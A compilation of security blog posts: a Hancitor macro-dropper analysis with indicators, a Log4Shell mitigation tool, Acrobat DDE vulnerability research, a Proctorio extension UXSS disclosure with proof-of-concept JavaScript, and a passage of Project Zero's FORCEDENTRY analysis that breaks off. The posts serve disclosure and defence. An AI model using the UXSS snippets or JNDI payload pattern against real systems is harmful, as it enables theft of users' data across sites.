  2. On clicking on the link (hxxp://mettlybothe.com/8/forum[.]php), a Word Document file is downloaded.
  3. On Enabling the macro content in Microsoft Word, the macro drops an embedded OLE, a password-protected macro-infected document file and launches it.
  4. This second Document file drops the main Hancitor DLL (Dynamic Link Library) payload.
  5. The DLL payload is then executed via rundll32.exe.
Figure 2 – Infection Chain
Figure 2 – Infection Chain

TECHNICAL ANALYSIS

Malware authors send the victims a phishing email containing a link as shown in the below screenshot (Figure 3). The usual Docusign theme is used in this recent Hancitor wave. This phishing email contains a link to the original malicious word document. On clicking the link, the Malicious Doc file is downloaded.

Figure 3 – Phishing mail pretending to be DocuSign
Figure 3 – Phishing mail pretending to be DocuSign

Since the macros are disabled by default configuration, malware authors try to lure victims into believing that the file is from legitimate organizations or individuals and will ask victims to enable editing and content to start the execution of macros. The screenshot below (Figure 4) is the lure technique that was observed in this current wave.

Figure 4 – Document Face
Figure 4 – Document Face

As soon as the victim enables editing, malicious macros are executed via the Document_Open function.

There is an OLE object embedded in the Doc file. The screenshot below (Figure 5) highlights the object as an icon.

Figure 5 – OLE embedded object marked inside red circle
Figure 5 – OLE embedded object marked inside the red circle

The loader VBA function, invoked by document_open, calls this random function (Figure 6), which moves the selection cursor to the exact location of the OLE object using the selection methods (.MoveDown, .MoveRight, .MoveTypeBackspace). Using the Selection.Copy method, it will copy the selected OLE object to the clipboard. Once it is copied in the clipboard it will be dropped under %temp% folder.

Figure 6 – VBA Function to Copy content to Clipboard
Figure 6 – VBA Function to Copy content to Clipboard

When an embedded object is being copied to the clipboard, it gets written to the temp directory as a file. This method is used by the malware author to drop a malicious word document instead of explicitly writing the file to disk using macro functions like the classic FileSystemObject.

In this case, the file was saved to the %temp% location with filename name “zoro.kl” as shown in the below screenshot (Fig 8). Fig 7 shows the corresponding procmon log involving the file write event.

Figure 7 – ProcMon log for the creation and WriteFile of “zoro.kl” in %temp% folder
Figure 7 – ProcMon log for the creation and WriteFile of “zoro.kl” in %temp% folder
Figure 8 – “zoro.kl” in %temp% location
Figure 8 – “zoro.kl” in %temp% location

Using the CreateObject(“Scripting.FileSystemObject”) method, the malware moves the file to a new location \Appdata\Roaming\Microsoft\Templates and renames it to “zoro.doc”.

Figure 9– VBA Function to rename and move the dropped Doc file
Figure 9– VBA Function to rename and move the dropped Doc file

This file is then opened with the built-in document method, Documents.open. This moved file, zoro.doc, is password-protected. In this case, the password used was “doyouknowthatthegodsofdeathonlyeatapples?”. We have also seen the usage of passwords likedonttouchme”, etc.

Figure 10 – VBA Function to password protect the Doc file
Figure 10 – VBA Function to password protect the Doc file

This newly dropped doc is executed using the Documents.Open function (Figure 11).

Figure 11 – VBA methods present inside “zoro.doc”
Figure 11 – VBA methods present inside “zoro.doc”

Zoro.doc uses the same techniques to copy and drop the next payload as we saw earlier. The only difference is that it has a DLL as the embedded OLE object.

It drops the file in the %temp% folder using clipboard with the name “gelforr.dap”. Again, it moves gelforr.dap DLL file to \Appdata\Roaming\Microsoft\Templates (Figure 12).

Figure 12 - Files dropped under the \Appdata\Roaming\Microsoft\Template folder
Figure 12 – Files dropped under the \Appdata\Roaming\Microsoft\Template folder

Finally, after moving DLL to the templates folder, it is executed using Rundll32.exe by another VBA call.

MITRE ATT&CK

Technique ID Tactic Technique details
T1566.002 Initial Access Spam mail with links
T1204.001 Execution User Execution by opening the link.
T1204.002 Execution Executing downloaded doc
T1218 Defense Evasion Signed Binary Execution Rundll32
T1071 C&C (Command & Control) HTTP (Hypertext Transfer Protocol) protocol for communication

 

IOC (Indicators Of Compromise)

Type SHA-256 Scanner Detection Name
Main Doc 915ea807cdf10ea4a4912377d7c688a527d0e91c7777d811b171d2960b75c65c WSS W97M/Dropper.im
Dropped Doc c1c89e5eef403532b5330710c9fe1348ebd055d0fe4e3ebbe9821555e36d408e WSS W97M/Dropper.im

 

Dropped DLL d83fbc9534957dd464cbc7cd2797d3041bd0d1a72b213b1ab7bccaec34359dbb WSS RDN/Hancitor
URLs (Uniform Resource Locator) hxxp://mettlybothe.com/8/forum[.]php WebAdvisor Blocked

 

The post HANCITOR DOC drops via CLIPBOARD appeared first on McAfee Blog.

log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

14 December 2021 at 07:11

tl;dr Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems.

In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).

Context: log4shell

Hello internet, it’s been a rough week. As you have probably learned, basically every Java app in the world uses a library called “log4j” to handle logging, and that any string passed into those logging calls will evaluate magic ${jndi:ldap://...} sequences to remotely load (malicious) Java class files over the internet (CVE-2021-44228, “Log4Shell”). Right now, while the SREs are trying to apply the not-quite-a-fix official fix and/or implement egress filtering without knocking their employers off the internet, most people are either blaming log4j for even having this JNDI stuff in the first place and/or blaming the issue on a lack of support for the project that would have helped to prevent such a dangerous behavior from being so accessible. In reality, the JNDI stuff is regrettably more of an “enterprise” feature than one that developers would just randomly put in if left to their own devices. Enterprise Java is all about antipatterns that invoke code in roundabout ways to the point of obfuscation, and supporting ever more dynamic ways to integrate weird protocols like RMI to load and invoke remote code dynamically in weird ways. Even the log4j format “Interpolator” wraps a bunch of handlers, including the JNDI handler, in reflection wrappers. So, if anything, more “(financial) support” for the project would probably just lead to more of these kinds of things happening as demand for one-off formatters for new systems grows among larger users. Welcome to Enterprise Java Land, where they’ve already added log4j variable expansion for Docker and Kubernetes. Alas, the real problem is that log4j 2.x (the version basically everyone uses) is designed in such a way that all string arguments after the main format string for the logging call are also treated as format strings. Basically all log4j calls are equivalent to if the following C:

printf("%s\n", "clobbering some bytes %n");

were implemented as the very unsafe code below:

char *buf;
asprintf(&buf, "%s\n", "clobbering some bytes %n");
printf(buf);

Basically, log4j never got the memo about format string vulnerabilities and now it’s (probably) too late. It was only a matter of time until someone realized they exposed a magic format string directive that led to code execution (and even without the classloading part, it is still a means of leaking expanded variables out through other JNDI-compatible services, like DNS), and I think it may only be a matter of time until another dangerous format string handler gets introduced into log4j. Meanwhile, even without JNDI, if someone has access to your log4j output (wherever you send it), and can cause their input to end up in a log4j call (pretty much a given based on the current havoc playing out) they can systematically dump all sorts of process and system state into it including sensitive application secrets and credentials. Had log4j not implemented their formatting this way, then the JNDI issue would only impact applications that concatenated user input into the format string (a non-zero amount, but much less than 100%).

The “Fixes”

The main fix is to update to the just released log4j 2.16.0. Prior to that, the official mitigation from the log4j maintainers was:

“In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.”

Apache Log4j

So to be clear, the fix given for older versions of log4j (2.0-beta9 until 2.10.0) is to find and purge the JNDI handling class from all of your JARs, which are probably all-in-one fat JARs because no one uses classpaths anymore, all to prevent it from being loaded.

A tool to mitigate Log4Shell by disabling log4j JNDI

To try to make the situation a little bit more manageable in the meantime, we are releasing log4j-jndi-be-gone, a dead simple Java agent that disables the log4j JNDI handler outright. log4j-jndi-be-gone uses the Byte Buddy bytecode manipulation library to modify the at-issue log4j class’s method code and short circuit the JNDI interpolation handler. It works by effectively hooking the at-issue JndiLookup class’ lookup() method that Log4Shell exploits to load remote code, and forces it to stop early without actually loading the Log4Shell payload URL. It also supports Java 6 through 17, covering older versions of log4j that support Java 6 (2.0-2.3) and 7 (2.4-2.12.1), and works on read-only filesystems (once installed or mounted) such as in read-only containers.

The benefit of this Java agent is that a single command line flag can negate the vulnerability regardless of which version of log4j is in use, so long as it isn’t obfuscated (e.g. with proguard), in which case you may not be in a good position to update it anyway. log4j-jndi-be-gone is not a replacement for the -Dlog4j2.formatMsgNoLookups=true system property in supported versions, but helps to deal with those older versions that don’t support it.

Using it is pretty simple, just add -javaagent:path/to/log4j-jndi-be-gone-1.0.0-standalone.jar to your Java commands. In addition to disabling the JNDI handling, it also prints a message indicating that a log4j JNDI attempt was made with a simple sanitization applied to the URL string to prevent it from becoming a propagation vector. It also “resolves” any JNDI format strings to "(log4j jndi disabled)" making the attempts a bit more grep-able.

$ java -javaagent:log4j-jndi-be-gone-1.0.0.jar -jar myapp.jar

log4j-jndi-be-gone is available from our GitHub repo, https://github.com/nccgroup/log4j-jndi-be-gone. You can grab a pre-compiled log4j-jndi-be-gone agent JAR from the releases page, or build one yourself with ./gradlew, assuming you have a recent version of Java installed.

Exploring Acrobat’s DDE attack surface

14 December 2021 at 12:13

Introduction

 

Adobe Acrobat have been our favorite target to poke at for bugs lately, knowing that it's one of the most popular and most versatile PDF readers available. In our previous research, we've been hammering Adobe Acrobat's JavaScript APIs by writing dharma grammars and testing them against Acrobat. As we continue investigating those APIs, we decided as a change of scenery to look into other features Adobe Acrobat has provided. Even though it has a rich attack surface yet we had to find which parts would be a good place to start looking for bugs.

While looking at the broker functions, we noticed that there’s a function that’s accessible through the renderer that triggers DDE calls. That by itself was a reason for us to start looking into the DDE component of Acrobat.

In this blog we'll dive into some of Adobe Acrobat attack surface starting with DDE within adobe using Adobe IAC.


DDE in Acrobat

To understand how DDE works let's first introduce the concept of inter-process communication (IPC).

So, what is IPC? It's a mechanism for processes to communicate with each other provided by the operating system. It could be that one process informs another about an event that has occurred, or it could be managing shared data between processes. In order for these processes to understand each other they have to agree on certain communication approach/protocol. There are several IPC mechanisms supported by windows such as: mailslots, pipes, DDE ... etc.

In Adobe Acrobat DDE is supported through Acrobat IAC which we will discuss later in this blog.


What is DDE?

In short DDE stands for Dynamic Data exchange which is a message-based protocol that is used for sending messages and transferring data between one process to another using shared memory.

In each inter-process communication with DDE, a client and a server engage in a conversation.

A DDE conversation is established using uniquely defined strings as follows:

  • Service name: a unique string defined by the application that implements the DDE server which will be used by both DDE Client and DDE server to initialize the communication.

  • Topic name: is a string that identifies a logical data context.

  • Item name: is a string that identifies a unit of data a server can pass to a client during a transaction.

 

DDE shares these strings by using it's Global Atom Table. For more details about Atoms. Also, DDE protocol defines how applications should use the wPram and lParam parameters to pass larger data pieces through shared memory handles and global atoms.


When is DDE used?

 

It is most appropriate for data exchanges that do not require ongoing user interaction. An application using DDE provides a way for the user to exchange data between the two applications. However, once the transfer is established, the applications continue to exchange data without further user intervention as in socket communication.

The ability to use DDE in an application running on windows can be added through DDMEL.


Introducing DDEML

The Dynamic Data Exchange Management Library DDEML by windows makes it easier to add DDE support to an application by providing an interface to simplify managing DDE conversations. Meaning that instead of sending, posting, and processing DDE messages directly, an application can use the DDEML functions to manage DDE conversations.

So, usually the following steps will happen when a DDE client wants to start conversation with the Server:

 

  1. Initialization

Before calling a DDE functionwe need to register our application with DDEML and specify the transaction filter flags for the callback function, the following functions used for the initialization part:

  •  DdeInitializeW()

  • DdeInitializeA()

 

    Note: "A" used to indicate "ANSI" A Unicode version with the letter "W" used to indicate "wide"

   

2. Establishing a Connection

In order to connect our client to a DDE Server we must use the Service and Topic names associated with the application. The following function will return a handle to our connection which will be used later for data transactions and connection termination:

  • DdeConnect()

 

3. Data Transaction

In order to send data from DDE client to DDE server we need to call the following function:

  • DdeClientTransaction()


4. Connection Termination

DDEML provides a function for terminating any DDE conversations and freeing any DDEML resources related:

  • DdeUninitialize()

Acrobat IAC

As we discussed before about Acrobat, Inter Application Communication (IAC) allows an external application to control and manipulate a PDF file inside Adobe Acrobat using several methods such as OLE and DDE.

For example, let's say you want to merge two PDF documents into one and save that document with a different name, what do we need to achieve that ?

  1. Obviously we need adobe acrobat DC pro .

  2. The service, topic names for acrobat.

    • Topic name is "Control"

    • Service Name:

      • AcroViewA21" here "A" means Acrobat and "21" refer to the version.

      • "AcroViewR21" here "R" for Reader.


    So, to retrieve the service name for your installation based on the product and the version you can check the registry key:

What is the item we are going to use ?

When we attempt to send a DDE command to the server implemented in acrobat the item will be NULL.

Acrobat Adobe Reader DC supports several DDE messages, but some of these messages require Adobe Acrobat Adobe DC Pro version in order to work.

The format of the message should be between brackets and it's case sensitive. e.g:

  • Displaying document: such as "[FileOpen()]" and "[DocOpen()]".

  • Saving and printing documents: such as "[DocSave()]" and "[DocPrint()]".

  • Searching document: such as "[DocFind()]".

  • Manipulating document such as: "[DocInsertPage()]" and "[DocDeletePages()]".


    Note: that in order to use Acrobat Adobe DDE messages that start with Doc, the file must be opened using [DocOpen()] message.

We started by defining Service and topic names for Adobe Acrobat and the DDE messages we want to send. In our case, we want to merge two Documents into one so we need three DDE methods "[DocOpen()]" , "[DocInsertPages()]" and "[DocSaveAs()]":


 Next, as we discussed before, we first need to register our application to DDEML using DdeInitialize():

After the initialization step we have to connect to the DDE server using Service and Topic that we defined earlier:

Now we need to send our message using DdeClientTransaction() and as we can see we used XTYPE_EXECUTE with NULL Item, and our command is stored in HDDEDATA handle by calling DdeCreateDataHandle(). After executing this part of code, Adobe Acrobat will open the PDF document and append the other document to it, and save it as new file then exit Adobe Acrobat:

The last part is closing the connection and cleaning the opened handles:

So we decided to take a look at adobe plugins to see who else is implementing DDE Server by searching for DdeInitilaize() call:

Great 😈 it seems we got five plugins that implement a DDE service, before we analyzing these plugins we went to search for more info about them and we found that the search and catalog plug-ins are documented by Adobe... good what next!

 

Search Plug-in

We started to read about the search plug-in and we summarized it in the following:

Acrobat has a feature which allows the user to search for a text inside PDF document. But we already mentioned a DDE method called DocFind() right? well, DocFind() will search the PDF document page by page while the search plug-in will perform an indexed search that allows to search a word in the form of a query, so in other word we can search a cataloged PDF 🙂.

So basically the search plug-in allows the client to send search queries and manipulate indexes.

When implementing a client that communicates with the search plug-in the service name and topic's name will be "Acrobat Search" instead of "Acroview".

 

Remember when we send a DDE request to Adobe Acrobat, the item was NULL, but in search plugin there are two types of items the client can use to submit a query data and one item for manipulating the index:

 

  • SimpleQuery item: Allows the user to send a query that support Boolean operation e.g if we want to search for  any occurrence of word "bye" or "hello" we can send "bye OR hello".

  • Query item: this allow different search query and we can specify the parser handling the query.

 

While the item name used to manipulate indexes is "Index” , the DDE transaction type will be "XTYPE_POKE" which is a single poke transaction.

So, we started by manipulating indexes. When we attempt to do an operation on indexes the data must be in the following form:

Where eAction represents the action to be made on the index:

  • Adding index

  • Deleting index

  • Enabling or Disabling index on the shelf.

 

The cbData[0] will store the index file path we want to do an action on - example: “C:\\XD\\test.pdx” and PDX file is an index file that is create by one or multiple IDX files.


CVE-2021-39860

So, we started analyzing the function responsible for handling the structure data sent by the client, and turned out there are no check on what data sent.

As we can see after calling DdeAccessData(), the EAX register will storea  pointer to our data and we can see it access whatever data at offset 4 . So if we want to trigger an access violation at "movsx eax,word ptr [ecx+4]" simply send a two byte string which result in Out-Of-Bound Read 🙂 as demonstrated in the following crash:

 

Catalog Plug-in

Acrobat DC has a feature that allows the user to create a full-text index file for one or multiple PDF documents that will be searchable using the search command. The file extension is PDX. It will store the text of all specified PDF documents.

Catalog Plug-in support several DDE methods such as:

  • [FileOpen(full path)] : Used to open an index file and display the edit index dialog box, the file name must end with PDX extension.

  • [FilePurge(full path)]:  Used to purge index definition file. The file name also must end with PDX extension.

 

The Topic name for Catalog is "Control" and the service name according to adobe documentation is "Acrobat", however if we check the registry key belonging to adobe catalog we can see that is "Acrocat" (meoww) instead of "Acrobat".

Using IDApro we can see the DDE methods that catalog plugin support along with Service and Topic names:

 

CVE-2021-39861 

Since there are several DDE methods that we can send to the catalog plugin and these DDE methods accept one argument (except for "App related methods") which is a path to a file,  we started analyzing the function responsible for handling this argument and turned out 🙂:

 

The function will check the start of the string (supplied argument) for \xFE\xFF, if it's there then call Bug() function which will read the string as Unicode string, otherwise it will call sub_22007210() which will read the string as ANSI string.

So, if we can send "\xFE\xFF" or byte order mask at the start of ASCII string then probably we will end up with Out-of-bound Read since it will look for Unicode NULL terminator which is "\x00\x00" instead of ASCII NULL terminator.

We can see here the function handling Unicode string :

 

And 😎:

Here we can see a snippet of the POC:

 

That’s it for today. Stay tuned for more new attack surfaces blogs!

Happy Hunting!

References

Proctorio Chrome extension Universal Cross-Site Scripting

14 December 2021 at 00:00

The switch to online exams

In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.

For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have no control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.

The usage of this software was covered by national media on a regular basis, as students fought to disallow universities to use this kind of software. This led to several court cases were universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.

Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.

All this was reason enough for us to have a closer look to this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no actions from Proctorio users.

Background

Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.

Vulnerability details

The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.

Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.

Proctorio Calculator

When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript, in the minified JavaScript this is in the function named ghij. The function eval() is a dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij does not check that the input is actually a mathematical expression.

Because the calculator is added to DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.

(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)

Exploitation to UXSS

By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.

The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number indicated by the first element of the array which is the message.

The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:

chrome.runtime.sendMessage([502, '1', '2', 'https://www.google.com/#'], alert);

(The # is used here to make sure anything which is appended after it is not sent to the server.)

This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to their webmail if it uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).

A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.

Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:

if (25 == a[0]) return chrome.tabs.executeScript(b.tab.id, {
    code: c0693(a[1])
}, function() {}), c({}), !0;

which calls:

function c0693(a) {
    return "(" + function(a) {
        var b = document.getElementsByTagName("body");
        if (b.length) b[0].innerHTML = a; else {
            b = document.getElementsByTagName("html")[0];
            var c = document.createElement("body");
            c.innerHTML = a;
            b.appendChild(c);
        }
    } + ")(" + a + ");";
}

This function c0693() contains a function which is converted to a string. This inner function not executed by the background page, but by converting it to a string it takes the text of this function, which is then called using the argument a in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.

Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesn’t change when navigating to a different page.

Message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.

For example, the following will allow the https://computest.nl origin to execute an alert on the https://example.com origin:

chrome.runtime.sendMessage([507, '1', '2', 'https://computest.nl/sleep#']);

chrome.runtime.sendMessage([25, 'alert(document.domain)']);

document.location = 'https://example.com';

The URL https://computest.nl/sleep is used here as an example of a URL that takes 5 seconds to respond.

The video below demonstrates the attack:

Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.

What can we do with UXSS?

An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.

With an Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.

For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)

Disclosure

We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.

In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.

Installing software on your (personal) device, either for work or for study always adds new risks end-users should be aware of. In general it is always wise to deinstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

By: Ryan
15 December 2021 at 17:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page,

in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

